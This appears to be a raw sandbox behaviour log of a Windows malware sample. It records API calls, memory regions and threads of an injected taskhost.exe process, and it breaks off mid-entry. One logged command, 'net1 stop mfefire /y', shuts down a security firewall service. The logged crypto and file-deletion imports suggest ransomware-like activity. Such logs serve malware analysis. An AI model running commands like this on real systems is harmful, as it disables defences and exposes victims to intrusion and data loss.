GetFileType (hFile=0xb) returned 0x2 [0125.880] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf7b8 | out: lpMode=0x1cf7b8) returned 1 [0125.880] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffee5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf7b0, lpReserved=0x0 | out: lpBuffer=0xffee5b50*, lpNumberOfCharsWritten=0x1cf7b0*=0x1e) returned 1 [0125.880] GetFileType (hFile=0xb) returned 0x2 [0125.880] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf7b8 | out: lpMode=0x1cf7b8) returned 1 [0125.880] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffec1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf7b0, lpReserved=0x0 | out: lpBuffer=0xffec1efc*, lpNumberOfCharsWritten=0x1cf7b0*=0x2) returned 1 [0125.881] _ultow (in: _Dest=0x889, _Radix=1898528 | out: _Dest=0x889) returned="2185" [0125.881] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffee5b50, nSize=0x800, Arguments=0xffee7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.881] GetFileType (hFile=0xb) returned 0x2 [0125.881] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf7b8 | out: lpMode=0x1cf7b8) returned 1 [0125.881] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffee5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf7b0, lpReserved=0x0 | out: lpBuffer=0xffee5b50*, lpNumberOfCharsWritten=0x1cf7b0*=0x34) returned 1 [0125.881] GetFileType (hFile=0xb) returned 0x2 [0125.882] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf7b8 | out: lpMode=0x1cf7b8) returned 1 [0125.882] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffec1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf7b0, lpReserved=0x0 | out: lpBuffer=0xffec1efc*, lpNumberOfCharsWritten=0x1cf7b0*=0x2) returned 1 [0125.882] NetApiBufferFree (Buffer=0x324d40) returned 0x0 [0125.882] NetApiBufferFree (Buffer=0x32c0e0) returned 0x0 [0125.882] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfefire /y" [0125.882] exit (_Code=2) Process: id = "417" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5dc7000" os_pid = "0x4a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14478 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14479 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14480 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14481 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14482 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 14483 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 14484 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14485 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 14486 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 14487 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 14488 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 14489 start_va = 0x190000 end_va = 0x191fff entry_point = 0x190000 region_type = mapped_file name = "msutb.dll.mui" filename = "\\Windows\\System32\\en-US\\msutb.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msutb.dll.mui") Region: id = 14490 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 14491 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 14492 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14493 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 14494 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 14495 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 14496 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 14497 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 14498 start_va = 0x620000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 14499 start_va = 0x7b0000 end_va = 0x1baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 14500 start_va = 0x1bb0000 end_va = 0x1fa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bb0000" filename = "" Region: id = 14501 start_va = 0x2040000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 14502 start_va = 0x2130000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 14503 start_va = 0x21b0000 end_va = 0x228efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 14504 start_va = 0x22e0000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 14505 start_va = 0x2440000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 14506 start_va = 0x24c0000 end_va = 0x257ffff entry_point = 0x24c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 14507 start_va = 0x2590000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 14508 start_va = 0x2640000 end_va = 0x264ffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 14509 start_va = 0x2660000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 14510 start_va = 0x26f0000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 14511 start_va = 0x2770000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 14512 start_va = 0x2800000 end_va = 0x287ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 14513 start_va = 0x2890000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 14514 start_va = 0x2910000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 14515 start_va = 0x29c0000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 14516 start_va = 0x2a40000 end_va = 0x2d0efff entry_point = 0x2a40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14517 start_va = 0x2d80000 end_va = 0x2dfffff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 14518 start_va = 0x2e00000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 14519 start_va = 0x2ee0000 end_va = 0x2f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 14520 start_va = 0x2fc0000 end_va = 0x303ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 14521 start_va = 0x3080000 end_va = 0x30fffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 14522 start_va = 0x3140000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 14523 start_va = 0x31d0000 end_va = 0x324ffff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 14524 start_va = 0x3280000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 14525 start_va = 0x3320000 end_va = 0x339ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 14526 start_va = 0x33c0000 end_va = 0x343ffff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 14527 start_va = 0x34d0000 end_va = 0x354ffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 14528 start_va = 0x3570000 end_va = 0x35effff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 14529 start_va = 0x3650000 end_va = 0x36cffff entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 14530 start_va = 0x36f0000 end_va = 0x376ffff entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 14531 start_va = 0x37a0000 end_va = 0x381ffff entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 14532 start_va = 0x38d0000 end_va = 0x394ffff entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 14533 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14534 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14535 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14536 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14537 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14538 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14539 start_va = 0xff7e0000 end_va = 0xff7f3fff entry_point = 0xff7e0000 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Region: id = 14540 start_va = 0x13f0e0000 end_va = 0x13f113fff entry_point = 0x0 region_type = private name = "private_0x000000013f0e0000" filename = "" Region: id = 14541 start_va = 0x7fef8080000 end_va = 0x7fef80bafff entry_point = 0x7fef8080000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 14542 start_va = 0x7fef8bb0000 end_va = 0x7fef8becfff entry_point = 0x7fef8bb0000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 14543 start_va = 0x7fef8bf0000 end_va = 0x7fef8bfafff entry_point = 0x7fef8bf0000 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 14544 start_va = 0x7fef8f70000 end_va = 0x7fef8f7afff entry_point = 0x7fef8f70000 region_type = mapped_file name = "hotstartuseragent.dll" filename = "\\Windows\\System32\\HotStartUserAgent.dll" (normalized: "c:\\windows\\system32\\hotstartuseragent.dll") Region: id = 14545 start_va = 0x7fef9030000 end_va = 0x7fef9047fff entry_point = 0x7fef9030000 region_type = mapped_file name = "playsndsrv.dll" filename = "\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll") Region: id = 14546 start_va = 0x7fefb040000 end_va = 0x7fefb04afff entry_point = 0x7fefb040000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 14547 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14548 start_va = 0x7fefb0d0000 end_va = 0x7fefb0e4fff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 14549 start_va = 0x7fefb200000 end_va = 0x7fefb326fff entry_point = 0x7fefb200000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 14550 start_va = 0x7fefb6b0000 end_va = 0x7fefb6bdfff entry_point = 0x7fefb6b0000 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 14551 start_va = 0x7fefb700000 end_va = 0x7fefb70bfff entry_point = 0x7fefb700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 14552 start_va = 0x7fefb8c0000 end_va = 0x7fefb933fff entry_point = 0x7fefb8c0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 14553 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 14554 start_va = 0x7fefbae0000 end_va = 0x7fefbaf7fff entry_point = 0x7fefbae0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 14555 start_va = 0x7fefbf10000 end_va = 0x7fefbf65fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 14556 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14557 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14558 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14559 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14560 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 14561 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 14562 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14563 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14564 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14565 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14566 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14567 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14568 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14569 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14570 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14571 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14572 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14573 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14574 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14575 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14576 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14577 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14578 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 14579 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 14580 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 14581 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 14582 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 14583 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 14584 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 14585 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 14586 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 14587 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 14588 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 14589 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 14590 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 14591 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 14592 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 14593 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 14594 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 14595 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 14596 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 14597 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 14598 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 14599 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14600 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 14601 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 14602 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 14603 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 14604 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 14605 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 14606 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 14791 start_va = 0x3450000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 14792 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 14793 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 14794 start_va = 0x7fefe360000 end_va = 0x7feff0e7fff entry_point = 0x7fefe360000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 14795 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14796 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Thread: id = 983 os_tid = 0x13ec Thread: id = 984 os_tid = 0x13e4 Thread: id = 985 os_tid = 0x13e0 Thread: id = 986 os_tid = 0x13d4 Thread: id = 987 os_tid = 0x13c8 Thread: id = 988 os_tid = 0x13bc Thread: id = 989 os_tid = 0x13b8 Thread: id = 990 os_tid = 0x13b0 Thread: id = 991 os_tid = 0x13ac Thread: id = 992 os_tid = 0x13a0 Thread: id = 993 os_tid = 0x139c Thread: id = 994 os_tid = 0x1398 Thread: id = 995 os_tid = 0x1394 Thread: id = 996 os_tid = 0x1370 Thread: id = 997 os_tid = 0xd64 Thread: id = 998 os_tid = 0x890 Thread: id = 999 os_tid = 0x7ec Thread: id = 1000 os_tid = 0x4f8 Thread: id = 1001 os_tid = 0x53c Thread: id = 1002 os_tid = 0x7d4 Thread: id = 1003 os_tid = 0x7bc Thread: id = 1004 os_tid = 0x76c Thread: id = 1005 os_tid = 0x768 Thread: id = 1006 os_tid = 0x760 Thread: id = 1007 os_tid = 0x4cc Thread: id = 1008 os_tid = 0x4c0 Thread: id = 1009 os_tid = 0x4a8 Thread: id = 1011 os_tid = 0xd58 [0126.015] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77550000 [0126.015] GetProcAddress (hModule=0x77550000, lpProcName="LoadLibraryA") returned 0x77567070 [0126.016] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x7fefaaa0000 [0126.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x7feff740000 [0126.019] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7fefddf0000 [0126.020] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7fefe360000 [0126.022] LoadLibraryA (lpLibFileName="Iphlpapi.dll") returned 0x7fefaf60000 [0126.024] GetProcAddress (hModule=0x77550000, lpProcName="GetLastError") returned 0x77572dd0 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="VirtualFree") returned 0x77561260 [0126.025] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptExportKey") returned 0x7feff748140 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="DeleteFileW") returned 0x7755ad90 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="GetDriveTypeW") returned 0x7756bdf0 [0126.025] GetProcAddress (hModule=0x77550000, lpProcName="GetCommandLineW") returned 